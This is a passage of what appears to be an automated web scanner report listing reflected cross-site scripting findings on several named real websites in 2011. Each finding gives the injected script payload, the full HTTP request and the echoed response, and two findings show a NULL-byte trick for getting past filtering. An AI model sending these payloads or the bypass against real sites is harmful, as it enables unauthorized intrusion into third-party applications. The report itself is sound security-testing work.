if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264243128ce57c<script>alert(1)</script>1e6668e0674",Pid:"p68511049",Arc:"186035359",Location:COMSCORE.BMX.Broker.Location,Title:COMSCORE.BMX.Broker.Title,Referrer:COMSCORE.BMX.Broker.Referrer,Grp:COMSCORE.BMX.Broker.getGrp("186035359"),Exp:COMSCORE.BM
...[SNIP]...

1.5. http://blog.sherifmansour.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.sherifmansour.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f455"><script>alert(1)</script>18723730872 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f455\"><script>alert(1)</script>18723730872 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9f455"><script>alert(1)</script>18723730872=1 HTTP/1.1
Host: blog.sherifmansour.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:20:00 GMT
Server: Apache
X-Pingback: http://blog.sherifmansour.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<a href="http://blog.sherifmansour.com/?9f455\"><script>alert(1)</script>18723730872=1&paged=2">
...[SNIP]...

1.6. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005f73f"><script>alert(1)</script>261222dadcb was submitted in the REST URL parameter 1. This input was echoed as 5f73f"><script>alert(1)</script>261222dadcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%005f73f"><script>alert(1)</script>261222dadcb HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 20:57:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1454464866566799616%3A175; expires=Tue, 01-Feb-2011 20:57:52 GMT; path=/; domain=digg.com
Set-Cookie: d=cad0fc2207f84a0081bcfda18c26e198b304cfae413597d0eedfcaf502baed6d; expires=Sun, 31-Jan-2021 07:05:32 GMT; path=/; domain=.digg.com
X-Digg-Time: D=423344 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15618

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%005f73f"><script>alert(1)</script>261222dadcb.rss">
...[SNIP]...

1.7. http://dm.de.mookie1.com/2/B3DM/2010DM/11768404287@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11768404287@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca2f4"><script>alert(1)</script>09dd599035 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMca2f4"><script>alert(1)</script>09dd599035/2010DM/11768404287@x23?USNetwork/RS_SELL_2011Q1_247_RTG_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMca2f4"><script>alert(1)</script>09dd599035/2010DM/1550664646/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.8. http://dm.de.mookie1.com/2/B3DM/2010DM/11768404287@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11768404287@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78496"><script>alert(1)</script>be0a7656f5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM78496"><script>alert(1)</script>be0a7656f5/11768404287@x23?USNetwork/RS_SELL_2011Q1_247_RTG_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM78496"><script>alert(1)</script>be0a7656f5/499192576/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IM
...[SNIP]...

1.9. http://dm.de.mookie1.com/2/B3DM/2010DM/11768404287@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11768404287@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f63fa"><script>alert(1)</script>3687d15fefd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11768404287@x23f63fa"><script>alert(1)</script>3687d15fefd?USNetwork/RS_SELL_2011Q1_247_RTG_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1315845720/x23f63fa"><script>alert(1)</script>3687d15fefd/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.10. http://dm.de.mookie1.com/2/B3DM/2010DM/1772729617@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1772729617@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d64b0"><script>alert(1)</script>1398b99ec43 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMd64b0"><script>alert(1)</script>1398b99ec43/2010DM/1772729617@x23?USNetwork/RS_SELL_2011Q1_247_RTG_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMd64b0"><script>alert(1)</script>1398b99ec43/2010DM/1412305390/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.11. http://dm.de.mookie1.com/2/B3DM/2010DM/1772729617@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1772729617@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75644"><script>alert(1)</script>cd999b58b78 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM75644"><script>alert(1)</script>cd999b58b78/1772729617@x23?USNetwork/RS_SELL_2011Q1_247_RTG_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM75644"><script>alert(1)</script>cd999b58b78/1470482050/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.12. http://dm.de.mookie1.com/2/B3DM/2010DM/1772729617@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1772729617@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dec1f"><script>alert(1)</script>7522f40b207 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1772729617@x23dec1f"><script>alert(1)</script>7522f40b207?USNetwork/RS_SELL_2011Q1_247_RTG_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/286984043/x23dec1f"><script>alert(1)</script>7522f40b207/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.13. http://dm.de.mookie1.com/2/B3DM/2010DM/1990402400@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1990402400@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cc89"><script>alert(1)</script>015ecd77db8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM1cc89"><script>alert(1)</script>015ecd77db8/2010DM/1990402400@x23?USNetwork/RS_SELL_2011Q1_247_RTG_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM1cc89"><script>alert(1)</script>015ecd77db8/2010DM/384225239/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.14. http://dm.de.mookie1.com/2/B3DM/2010DM/1990402400@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1990402400@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f88a5"><script>alert(1)</script>a0d712db7ee was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMf88a5"><script>alert(1)</script>a0d712db7ee/1990402400@x23?USNetwork/RS_SELL_2011Q1_247_RTG_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMf88a5"><script>alert(1)</script>a0d712db7ee/140603636/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.15. http://dm.de.mookie1.com/2/B3DM/2010DM/1990402400@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1990402400@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2110c"><script>alert(1)</script>f165b1bce56 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1990402400@x232110c"><script>alert(1)</script>f165b1bce56?USNetwork/RS_SELL_2011Q1_247_RTG_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/2034018270/x232110c"><script>alert(1)</script>f165b1bce56/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.16. http://goop.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goop.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66a5c"><script>alert(1)</script>29cbc4784fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?66a5c"><script>alert(1)</script>29cbc4784fc=1 HTTP/1.1
Host: goop.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 21:10:24 GMT
Server: Apache
Served-By: Joyent
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServergoop.com_http_pool=2720336906.20480.0000; path=/
Content-Length: 4970

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Con
...[SNIP]...
<a href="?66a5c"><script>alert(1)</script>29cbc4784fc=1&lan=en">
...[SNIP]...

1.17. http://goop.com/css/global.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goop.com
Path:   /css/global.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c8ea7<script>alert(1)</script>7d0af9d8db0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssc8ea7<script>alert(1)</script>7d0af9d8db0/global.css HTTP/1.1
Host: goop.com
Proxy-Connection: keep-alive
Referer: http://goop.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServergoop.com_http_pool=2720336906.20480.0000

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:11:05 GMT
Server: Apache
Served-By: Joyent
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 513

<html>
<head>
   <title> 404 Error Page</title>
</head>
<body style="text-align:center; background-color:#F7F7F7; ">
   <h2>Sorry... Page Not Found...</h2>
(Mon Jan 31 2011 9:11:05 pm GMT)

   <br><br>
   IP
...[SNIP]...
<b>goop.com/cssc8ea7<script>alert(1)</script>7d0af9d8db0/global.css</b>
...[SNIP]...

1.18. http://goop.com/css/global.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goop.com
Path:   /css/global.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00a0a49<script>alert(1)</script>b01993571b7 was submitted in the REST URL parameter 2. This input was echoed as a0a49<script>alert(1)</script>b01993571b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /css/global.css%00a0a49<script>alert(1)</script>b01993571b7 HTTP/1.1
Host: goop.com
Proxy-Connection: keep-alive
Referer: http://goop.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServergoop.com_http_pool=2720336906.20480.0000

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:11:38 GMT
Server: Apache
Served-By: Joyent
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 516

<html>
<head>
   <title> 404 Error Page</title>
</head>
<body style="text-align:center; background-color:#F7F7F7; ">
   <h2>Sorry... Page Not Found...</h2>
(Mon Jan 31 2011 9:11:38 pm GMT)

   <br><br>
   IP
...[SNIP]...
<b>goop.com/css/global.css%00a0a49<script>alert(1)</script>b01993571b7</b>
...[SNIP]...

1.19. http://goop.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goop.com
Path:   /favicon.ico

Issue detail

